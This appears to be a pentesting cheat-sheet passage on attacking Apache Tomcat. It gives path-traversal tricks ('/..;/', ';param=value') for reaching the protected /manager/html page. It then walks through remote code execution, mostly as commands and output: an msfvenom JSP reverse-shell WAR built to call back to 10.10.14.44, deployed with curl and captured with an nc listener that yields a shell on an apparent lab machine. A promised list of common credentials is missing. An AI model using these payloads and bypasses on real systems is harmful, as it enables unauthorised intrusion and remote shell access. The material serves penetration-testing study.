The most interesting path of Tomcat is /manager/html, inside that path you can upload and deploy war files (execute code). But this path is protected by basic HTTP auth, the most common credentials are:
In some vulnerable configurations of Tomcat you can gain access to protected directories in Tomcat using the path: /..;/
So, for example, you might be able to access the Tomcat manager page by accessing: www.vulnerable.com/lalala/..;/manager/html
Another way to bypass protected paths using this trick is to access http://www.vulnerable.com/;param=value/manager/html
RCE through .WAR
Finally, if you have access to the Tomcat Web Application Manager, you can upload and deploy a .war file (execute code).
## Create payload
$ msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.44 lport=4488 -f war > rev-shell.war
## Upload payload
$ curl -u 'tomcat':'$3cureP4s5w0rd123!' -T rev.war 'http://10.10.10.194:8080/manager/text/deploy?path=/rev-shell'
OK - Deployed application at context path [/rev-shell]
## List deployed payload
$ curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/list
OK - Listed applications for virtual host [localhost]
/:running:0:ROOT
/examples:running:0:/usr/share/tomcat9-examples/examples
/host-manager:running:0:/usr/share/tomcat9-admin/host-manager
/rev-shell:running:0:rev-shell
/manager:running:0:/usr/share/tomcat9-admin/manager
/docs:running:0:/usr/share/tomcat9-docs/docs
## Execute deployed payload
root@nidus:/git/htb/tabby# curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/rev-shell/
## Capture incoming shell
root@nidus:/usr/share/tomcat9# nc -lvnp 4488
listening on [any] 4488 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.194] 45912
whoami
tomcat
Last updated
Was this helpful?
The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection (from ).
